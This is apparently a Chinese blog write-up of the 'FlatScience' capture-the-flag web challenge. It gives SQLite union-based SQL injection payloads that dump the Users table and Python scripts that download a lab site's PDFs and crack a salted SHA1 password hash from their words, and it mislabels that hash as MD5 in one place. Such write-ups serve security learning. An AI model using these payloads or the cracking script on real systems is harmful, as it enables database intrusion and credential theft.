WEB:FlatScience

最新推荐文章于 2024-11-03 09:30:00 发布
最新推荐文章于 2024-11-03 09:30:00 发布
阅读量303 收藏
点赞数
分类专栏: 攻防世界 文章标签: 数据库 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gsumall04/article/details/131803806
版权
文章描述了一次通过SQL注入攻击发现SQLite3数据库中的用户信息,利用payload获取了用户名、密码和提示信息。然后编写Python脚本批量下载PDF文件,并通过文本内容对比找到与MD5匹配的密码部分,最终解密出PDF的访问密码。
摘要由CSDN通过智能技术生成

背景知识

        sql注入

        SQLite数据库知识

        SQLite3注入方法

题目

 

 用dirsearch进行扫描,下面几个关键目录:robots.txtlogin.phpadmin.php,剩下的目录就是一些pdf格式的论文了

 一个一个访问并查看源代码,在查看login.php发现

 

进行代码审计

 发现数据库为SQLite3

还发现输入的usr存在注入

没有任何过滤,能够拼接进数据库中执行

使用bp进行抓包拦截注入

判断字段数

输入

1' order by 3 --

再输入,回显正常,所以可知字段数为2

1' order by 2 --

 判断回显

1' union select 1,2 --

回显为第二位

 查sql表中字段

1' union select name,sql from sqlite_master--

 

将url编码进行解码

+CREATE+TABLE+Users%28id+int+primary+key%2Cname+varchar%28255%29%2Cpassword+varchar%28255%29%2Chint+varchar%28255%29%29

 

得到

 CREATE TABLE Users(id int primary key,name varchar(255),password varchar(255),hint varchar(255))

 可知字段有:id name password hint

构造查询name的payload

1' union select id, name from Users--

 

得到admin

构造查询password的payload

1' union select id, password from Users--

 

 得到3fab54a50e770d830c0416df817567662a9dc85c

构造查询hint的payload

1' union select id, hint from Users--

得到 my+fav+word+in+my+fav+paper%3F%21

进行解码后得到 my fav word in my fav paper?!

经过上述操作就得到了表中的第一个数据

id=1

name=admin

password=3fab54a50e770d830c0416df817567662a9dc85c(MD5是消息摘要加密,可能会解不出来)

hint=my+fav+word+in+my+fav+paper?!(说的就是在他的论文里面)

得到ThinJerboaSalz! 

获取PDF密码脚本如下:

python3爬取多目标网页PDF文件并下载到指定目录

import urllib.request
import re
import os


# open the url and read
def getHtml(url):
    page = urllib.request.urlopen(url)
    html = page.read()
    page.close()
    return html

def getUrl(html):
    reg = r'(?:href|HREF)="?((?:http://)?.+?.pdf)'
    url_re = re.compile(reg)
    url_lst = url_re.findall(html.decode('utf-8'))
    return(url_lst)

def getFile(url):
    file_name = url.split('/')[-1]
    u = urllib.request.urlopen(url)
    f = open(file_name, 'wb')

    block_sz = 8192
    while True:
        buffer = u.read(block_sz)
        if not buffer:
            break

        f.write(buffer)
    f.close()
    print ("Sucessful to download" + " " + file_name)

#指定网页
root_url = ['http://111.198.29.45:54344/1/2/5/',
            'http://111.198.29.45:54344/']

raw_url = ['http://111.198.29.45:54344/1/2/5/index.html',
            'http://111.198.29.45:54344/index.html'
           ]
#指定目录
os.mkdir('ldf_download')
os.chdir(os.path.join(os.getcwd(), 'ldf_download'))
for i in range(len(root_url)):
    print("当前网页:",root_url[i])
    html = getHtml(raw_url[i])
    url_lst = getUrl(html)

    for url in url_lst[:]:
        url = root_url[i] + url
        getFile(url)

python3识别PDF内容并进行密码对冲

from io import StringIO

#python3
from pdfminer.pdfpage import PDFPage
from pdfminer.converter import TextConverter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTTextBoxHorizontal, LAParams
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter


import sys
import string
import os
import hashlib
import importlib
import random
from urllib.request import urlopen
from urllib.request import Request


def get_pdf():
    return [i for i in os.listdir("./ldf_download/") if i.endswith("pdf")]
 
 
def convert_pdf_to_txt(path_to_file):
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    codec = 'utf-8'
    laparams = LAParams()
    device = TextConverter(rsrcmgr, retstr, codec=codec, laparams=laparams)
    fp = open(path_to_file, 'rb')
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    password = ""
    maxpages = 0
    caching = True
    pagenos=set()

    for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages, password=password,caching=caching, check_extractable=True):
        interpreter.process_page(page)

    text = retstr.getvalue()

    fp.close()
    device.close()
    retstr.close()
    return text
 
 
def find_password():
    pdf_path = get_pdf()
    for i in pdf_path:
        print ("Searching word in " + i)
        pdf_text = convert_pdf_to_txt("./ldf_download/"+i).split(" ")
        for word in pdf_text:
            sha1_password = hashlib.sha1(word.encode('utf-8')+'Salz!'.encode('utf-8')).hexdigest()
            if (sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c'):
                print ("Find the password :" + word)
                exit()
            
 
if __name__ == "__main__":
    find_password()

所以得到ThinJerboaSalz!还要去掉Salz,则密码为ThinJerboa

得到flag 

参考文章链接:
【攻防世界WEB】难度四星12分进阶题:FlatScience-云社区-华为云

【愚公系列】2023年05月 攻防世界-Web(FlatScience)_愚公搬代码的博客-CSDN博客

【攻防世界】二十四 --- FlatScience --- SQLite注入_通地塔的博客-CSDN博客

 

 

sleepywin
关注
专栏目录
攻防世界WebFlatScience
Light_inthe_eyes的博客
10-16 322
打开网页后,发现很多链接,点击后发现都是文章: 找不到突破口,用御剑扫扫看看有没有其他目录能进入,发现有robots.txt: 进入robots.txt: 发现有login.php和admin.php,通过代码审计,admin.php注释告诉不能通过它来突破,那就去login.php吧: 尝试SQL注入,发现有回显!并且知道这是sqlite数据库,并且单引号字符型注入: 爆字段量:1' order by 2--+不报错,1' order by 3--+报错,说明字段量为2: 查询资料了解: 意思就是:在
[CTF题目总结-web篇]攻防世界:flatscience
T2hunz1
01-13 1770
[CTF题目总结-web篇]攻防世界:flatscience
【攻防世界WEB】难度四星12分进阶题:FlatScience
07-23 698
【攻防世界WEB】四星12分
攻防世界:web FlatScience
Zeker62的博客
09-08 146
目录题目分析目录扫描检查页面代码审计SQL注入题目分析 拿到题目,就有很多按钮可以点击 点开之后,发现会下载好多paper,这应该就是web坐着写的论文 点开here,this等等东西 会发现有更多的paper等着你下 下载下来的paper是全英文,估计是机器学习数学建模等东西,反正我也看不懂在手足无措的时候,直接上 目录扫描工具进行扫描 目录扫描 使用御剑扫描工具扫描,发现存在robots.t...
攻防世界-web-FlatScience
wuh2333的博客
10-25 461
攻防世界,webFlatScience
Web(FlatScience)
m0_56010012的博客
03-20 687
题目描述: (1)暂时看不出来是什么类型的题目,采用御剑扫描后台,扫描网址,扫描到四个文件。 (2)依次打开几个网址,在admin和login页面都有登陆界面,但是在admin源代码中,有提示并不能通过一些通过该界面。 (3)主要针对login.php进行渗透操作, (4)根据提示,构造payload: 111.200.241.244:53862/login.php?debug 发现有特殊回显 <?php if(isset($_POST['usr']) &&a...
攻防世界 web FlatScience
tothemoon的博客
03-04 397
打开网页后每个转跳都点一下发现都是pdf文件除了here 进入了根目录1,然后点here或者these会进入不同的根目录。 这也太难看出其中的奥秘了,用dirsearch跑一下。 经过测试后:发现login.php与admin.php是解题的关键 ...
FlatScience XCTF web进阶区FlatScience详解
林英俊的博客
09-11 782
FlatScience XCTF web进阶区FlatScience详解目录扫描测试注入,万能密码获取所有的PDF的URL,并下载到本地,这里要用下递归把PDF所有的单词全部搞出来 一个个加密对和密码对比登录找到flag![在这里插入图片描述](https://img-blog.csdnimg.cn/aa3376d01a094c57ae92f9e2f2ee3a02.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50
XCTF Web 记录(FlatScience
ximo的博客
03-08 239
前言 今天开始每日一题,周末不更。 FlatScience 进来以后,一串英文,翻译: 最佳论文 嘿!欢迎来到我的(部分未完成)oldskool网站! 我是Flux Horst教授。。“啊,”努夫说-你应该了解我! 这是我迄今为止写的一些著名论文。 也许你自己去看看?! 试试这个或者这个或者到这里来 然后三个可以点击的位置,进去后时pdf文件,查看页面源码也没什么有用的。 查看robots.txt看看有没有信息: 啊,进去看看。 login.php: admin.php: 这里admin页面直接就
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界web进阶区FlatScience
gongjingege的博客
08-05 319
打开链接 给了好几个地址,到处点,全是一些文章(还是英文的) dirsearch扫一下 或者robots.txt 到admin.php里看一下 试一下admin 不行?看一下源码 估计就不是从这上手了,那就login.php吧 试一试sql注入 报错,发现不是mysql,而是sqlite3(那这就难受了啊) 查看源码 url栏?debug= ?debug出现源码泄露 <?php if(isset($_POST['usr']) && isset($_POST['pw'])
oceanbase V4.2.2社区版集群离线部署
king_harry的专栏
11-01 686
版本,选择是上传文件,包含oceanbase-ce、oceanbase-ce-libs、oceanbase-ce-utils。关闭时展示,为 OBProxy 集群的访问地址,仅用于生成租户的连接串,不影响实际使用,需要自主配置负载均衡,如果是 VIP 地址,还需要您自主申请并绑定到 OBProxy Server。集群配置选项卡—更多配置—更改系统内存保留选项,默认是30G,如果测试机内存只有16G,则需要调小,本测试调整为2G,这样ocp-server安装不会失败。自定义待管理的集群的名称。
JAVA 插入 JSON 对象到 PostgreSQL
qq_52143611的博客
10-30 884
在现代软件开发中,由于 JSON 数据的轻量和通用性,处理 JSON 数据已经变得无处不在。PostgreSQL凭借其对 JSON 的强大支持,为存储和查询 JSON 数据提供了出色的平台。为了将JSON数据保存到PostgreSQL数据库中,我们可以将JSON数据转换为PostgreSQL的JSONB类型数据,然后将其存储在数据库中。在Java中,我们可以使用JDBC或者基于ORM框架的方式来实现这一功能。
【FL0013】基于SpringBoot和微信小程序的机电公司管理信息系统
最新发布
Wo_Hui12138的博客
11-03 370
如今社会上各行各业,都喜欢用自己行业的专属软件工作,互联网发展到这个时候,人们已经发现离不开了互联网。新技术的产生,往往能解决一些老技术的弊端问题。因为传统机电公司管理信息系统信息管理难度大,容错率低,管理人员处理数据费工费时,所以专门为解决这个难题开发了一个机电公司管理信息系统管理系统,可以解决许多问题。 机电公司管理信息系统管理系统按照操作主体分为管理员和用户。管理员的功能包括字典管理、公告管理、考勤管理、客户管理、机电零件管理、机电零件订单管理、请假管理、机电设备管理、机电设备订单管理、用户管理、管理
【重学 MySQL】七十九、深入探索用户变量
CSDN全栈领域优秀博主,阿里云博客专家,工信部权威认证物联网技术开发工程师,曾30分钟高分通过C语言二级,两天手撸代码完成EasyX飞机大战,靠接软件私活一个月换苹果电脑
10-30 875
定义:用户变量以“@”符号开头,后面跟着变量名。变量名可以是任何随机的、复合的标量表达式,只要其中没有列指定。赋值可以使用SET语句来定义和赋值用户变量,如。也可以使用SELECT语句来为用户变量赋值,但必须使用“:=”赋值运算符,因为在SELECT语句中,MySQL将“=”运算符视为等于运算符。例如,。作用域:会话用户变量的作用域是当前会话,而局部变量的作用域是其定义的BEGIN/END语句块。命名:会话用户变量以“@”符号开头,而局部变量不需要。使用场景。
JAVA中的MVC三层架构
楠寻寻的博客
10-30 1010
MVC(Model-View-Controller)是一种软件设计模式,用于将应用程序分为主要的部分:模型(Model)、视图(View)和控制器(Controller)。这种架构有助于提高代码的可维护性和可扩展性。Spring框架通过@Controller@Service和注解清晰地划分了MVC三层架构的各个层次,使得开发人员能够更高效地构建和维护复杂的Web应用。POJO类:用于表示业务实体,通常包含属性和相关的getter/setter方法。DAO类:用于封装对数据库的操作,提供数据访问的接口。
真·香!深度体验 zCloud 数据库云管平台 -- DBA日常管理篇
weixin_54551388的博客
11-01 476
点击蓝字 关注我们zCloud 作为一款业界领先的数据库云管平台,通过云化自治的部署能力、智能巡检和诊断能力、知识即代码的沉淀能力,为DBA的日常管理工作带来了革新式的简化与优化。经过一周的深度体验,今天笔者与您深入探讨 zCloud 在数据库用户、参数以及日志管理方面的具体应用,看它如何为DBA的日常管理工作带来价值。数据库用户管理“常在河边走哪有不湿鞋”,作为DBA或多或少都曾遇到过因权限配置...
SpringSession源码分析
lkr_lkr的博客
11-01 263
默认对常规Session的理解和使用,如何使用Set-Cookie。
数据库
wjj20040809的博客
11-02 588
表与表的关系:核心表mysql/oracle、SQLServer(微软)SQL。
精通Java Web:从基础到Struts2框架
"《Java Web开发完全掌握》是一本详尽阐述Java Web开发技术的书籍,旨在帮助初学者和有经验的开发者深入理解并熟练运用Java Web相关技术。它涵盖了JavaScript、JSP、JavaBean、EL(表达式语言)、JSP标签库、Servlet...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值